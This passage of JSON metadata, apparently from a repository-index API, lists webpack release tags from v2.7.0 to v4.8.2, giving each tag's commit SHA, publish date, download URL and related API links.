eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/ta